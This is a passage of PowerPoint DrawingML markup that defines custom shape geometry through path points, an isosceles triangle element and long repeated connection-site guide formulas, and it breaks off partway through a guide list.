                  <a:lnTo>
                    <a:pt x="1622229" y="3081405"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="749018" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1498036" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123527" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123527" y="3024336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374509" y="3024336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374509" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9510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Isosceles Triangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE07520C-E6FE-4F09-A947-EA6F68046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8297" y="5013963"/>
              <a:ext cx="300437" cy="20934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3A5724F3-C522-4B0D-93EE-ECF44EBFB9F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="678773">
              <a:off x="10108027" y="4569149"/>
              <a:ext cx="338104" cy="343148"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst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62894 h 3939732"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3897869"/>
                <a:gd name="connsiteY1" fmla="*/ 1381594 h 3939732"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3897869"/>
                <a:gd name="connsiteY2" fmla="*/ 2033280 h 3939732"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3897869"/>
                <a:gd name="connsiteY3" fmla="*/ 2631017 h 3939732"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3897869"/>
                <a:gd name="connsiteY4" fmla="*/ 1997628 h 3939732"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3897869"/>
                <a:gd name="connsiteY5" fmla="*/ 1825498 h 3939732"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY6" fmla="*/ 1362894 h 3939732"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY7" fmla="*/ 36923 h 3939732"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3897869"/>
                <a:gd name="connsiteY8" fmla="*/ 1508593 h 3939732"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3897869"/>
                <a:gd name="connsiteY9" fmla="*/ 2416710 h 3939732"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3897869"/>
                <a:gd name="connsiteY10" fmla="*/ 2417653 h 3939732"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3897869"/>
                <a:gd name="connsiteY11" fmla="*/ 2822329 h 3939732"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3897869"/>
                <a:gd name="connsiteY12" fmla="*/ 2836256 h 3939732"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3897869"/>
                <a:gd name="connsiteY13" fmla="*/ 2835026 h 3939732"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3897869"/>
                <a:gd name="connsiteY14" fmla="*/ 2827425 h 3939732"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3897869"/>
                <a:gd name="connsiteY15" fmla="*/ 2555951 h 3939732"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3897869"/>
                <a:gd name="connsiteY16" fmla="*/ 2549477 h 3939732"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY17" fmla="*/ 3084844 h 3939732"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3897869"/>
                <a:gd name="connsiteY18" fmla="*/ 2011053 h 3939732"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3897869"/>
                <a:gd name="connsiteY19" fmla="*/ 959078 h 3939732"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY20" fmla="*/ 937262 h 3939732"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3897869"/>
                <a:gd name="connsiteY21" fmla="*/ 1165194 h 3939732"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3897869"/>
                <a:gd name="connsiteY22" fmla="*/ 869152 h 3939732"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3897869"/>
                <a:gd name="connsiteY23" fmla="*/ 794408 h 3939732"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3897869"/>
                <a:gd name="connsiteY24" fmla="*/ 2090795 h 3939732"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3897869"/>
                <a:gd name="connsiteY25" fmla="*/ 2032862 h 3939732"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3897869"/>
                <a:gd name="connsiteY26" fmla="*/ 1337965 h 3939732"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3897869"/>
                <a:gd name="connsiteY27" fmla="*/ 1338068 h 3939732"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3897869"/>
                <a:gd name="connsiteY28" fmla="*/ 566301 h 3939732"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3897869"/>
                <a:gd name="connsiteY29" fmla="*/ 2265435 h 3939732"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3897869"/>
                <a:gd name="connsiteY30" fmla="*/ 3399556 h 3939732"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3897869"/>
                <a:gd name="connsiteY31" fmla="*/ 3063923 h 3939732"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3897869"/>
                <a:gd name="connsiteY32" fmla="*/ 3500815 h 3939732"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3897869"/>
                <a:gd name="connsiteY33" fmla="*/ 3895311 h 3939732"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3897869"/>
                <a:gd name="connsiteY34" fmla="*/ 2371338 h 3939732"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY35" fmla="*/ 36923 h 3939732"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3897869"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3897869"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3897869"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3897869"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3897869"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3897869"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3897869"/>
                <a:gd name="connsiteY9" fmla="*/ 2425440 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3897869"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3897869"/>
                <a:gd name="connsiteY11" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3897869"/>
                <a:gd name="connsiteY12" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3897869"/>
                <a:gd name="connsiteY13" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3897869"/>
                <a:gd name="connsiteY14" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3897869"/>
                <a:gd name="connsiteY15" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3897869"/>
                <a:gd name="connsiteY16" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY17" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3897869"/>
                <a:gd name="connsiteY18" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3897869"/>
                <a:gd name="connsiteY19" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY20" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3897869"/>
                <a:gd name="connsiteY21" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3897869"/>
                <a:gd name="connsiteY22" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3897869"/>
                <a:gd name="connsiteY23" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3897869"/>
                <a:gd name="connsiteY24" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3897869"/>
                <a:gd name="connsiteY25" fmla="*/ 2041592 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3897869"/>
                <a:gd name="connsiteY26" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3897869"/>
                <a:gd name="connsiteY27" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3897869"/>
                <a:gd name="connsiteY28" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3897869"/>
                <a:gd name="connsiteY29" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3897869"/>
                <a:gd name="connsiteY30" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3897869"/>
                <a:gd name="connsiteY31" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3897869"/>
                <a:gd name="connsiteY32" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3897869"/>
                <a:gd name="connsiteY33" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3897869"/>
                <a:gd name="connsiteY34" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY35" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3876965"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3876965"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3876965"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3876965"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3876965"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3876965"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3876965"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3876965"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3876965"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3876965"/>
                <a:gd name="connsiteY9" fmla="*/ 2425440 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3876965"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3876965"/>
                <a:gd name="connsiteY11" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3876965"/>
                <a:gd name="connsiteY12" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3876965"/>
                <a:gd name="connsiteY13" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3876965"/>
                <a:gd name="connsiteY14" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3876965"/>
                <a:gd name="connsiteY15" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3876965"/>
                <a:gd name="connsiteY16" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3876965"/>
                <a:gd name="connsiteY17" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3876965"/>
                <a:gd name="connsiteY18" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3876965"/>
                <a:gd name="connsiteY19" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3876965"/>
                <a:gd name="connsiteY20" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3876965"/>
                <a:gd name="connsiteY21" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3876965"/>
                <a:gd name="connsiteY22" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3876965"/>
                <a:gd name="connsiteY23" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3876965"/>
                <a:gd name="connsiteY24" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3876965"/>
                <a:gd name="connsiteY25" fmla="*/ 2041592 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3876965"/>
                <a:gd name="connsiteY26" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3876965"/>
                <a:gd name="connsiteY27" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3876965"/>
                <a:gd name="connsiteY28" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3876965"/>
                <a:gd name="connsiteY29" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3876965"/>
                <a:gd name="connsiteY30" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3876965"/>
                <a:gd name="connsiteY31" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3876965"/>
                <a:gd name="connsiteY32" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3876965"/>
                <a:gd name="connsiteY33" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3876965"/>
                <a:gd name="connsiteY34" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3876965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671055 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383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704679 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2448797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164582 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3176822 w 3888568"/>
                <a:gd name="connsiteY11" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3146203 w 3888568"/>
                <a:gd name="connsiteY12" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3151211 w 3888568"/>
                <a:gd name="connsiteY13" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2397082 w 3888568"/>
                <a:gd name="connsiteY14" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2396219 w 3888568"/>
                <a:gd name="connsiteY15" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3888568"/>
                <a:gd name="connsiteY16" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 990519 w 3888568"/>
                <a:gd name="connsiteY17" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1593790 w 3888568"/>
                <a:gd name="connsiteY18" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1746058 w 3888568"/>
                <a:gd name="connsiteY19" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2206475 w 3888568"/>
                <a:gd name="connsiteY20" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2185910 w 3888568"/>
                <a:gd name="connsiteY21" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2656644 w 3888568"/>
                <a:gd name="connsiteY22" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2828567 w 3888568"/>
                <a:gd name="connsiteY23" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3362812 w 3888568"/>
                <a:gd name="connsiteY24" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3289926 w 3888568"/>
                <a:gd name="connsiteY25" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3290031 w 3888568"/>
                <a:gd name="connsiteY26" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 1700745 w 3888568"/>
                <a:gd name="connsiteY27" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 571995 w 3888568"/>
                <a:gd name="connsiteY28" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2267548 w 3888568"/>
                <a:gd name="connsiteY29" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3194376 w 3888568"/>
                <a:gd name="connsiteY30" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3268026 w 3888568"/>
                <a:gd name="connsiteY31" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 2347298 w 3888568"/>
                <a:gd name="connsiteY32" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 42617 w 3888568"/>
                <a:gd name="connsiteY33" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 1594841 w 3888568"/>
                <a:gd name="connsiteY34" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3892469"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3892469"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3892469"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3892469"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3892469"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3892469"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3892469"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3892469"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3892469"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3706266 w 3892469"/>
                <a:gd name="connsiteY9" fmla="*/ 2457195 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3164582 w 3892469"/>
                <a:gd name="connsiteY10" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3176822 w 3892469"/>
                <a:gd name="connsiteY11" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3146203 w 3892469"/>
                <a:gd name="connsiteY12" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3151211 w 3892469"/>
                <a:gd name="connsiteY13" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2397082 w 3892469"/>
                <a:gd name="connsiteY14" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2396219 w 3892469"/>
                <a:gd name="connsiteY15" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3892469"/>
                <a:gd name="connsiteY16" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 990519 w 3892469"/>
                <a:gd name="connsiteY17" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1593790 w 3892469"/>
                <a:gd name="connsiteY18" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1746058 w 3892469"/>
                <a:gd name="connsiteY19" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2206475 w 3892469"/>
                <a:gd name="connsiteY20" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2185910 w 3892469"/>
                <a:gd name="connsiteY21" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2656644 w 3892469"/>
                <a:gd name="connsiteY22" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2828567 w 3892469"/>
                <a:gd name="connsiteY23" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3362812 w 3892469"/>
                <a:gd name="connsiteY24" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3289926 w 3892469"/>
                <a:gd name="connsiteY25" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3290031 w 3892469"/>
                <a:gd name="connsiteY26" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 1700745 w 3892469"/>
                <a:gd name="connsiteY27" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 571995 w 3892469"/>
                <a:gd name="connsiteY28" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2267548 w 3892469"/>
                <a:gd name="connsiteY29" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3194376 w 3892469"/>
                <a:gd name="connsiteY30" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3268026 w 3892469"/>
                <a:gd name="connsiteY31" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 2347298 w 3892469"/>
                <a:gd name="connsiteY32" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 42617 w 3892469"/>
                <a:gd name="connsiteY33" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 1594841 w 3892469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2397082 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY31" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY32" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY33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2397082 w 3890413"/>
                <a:gd name="connsiteY12" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 1346695 h 3948462"/>
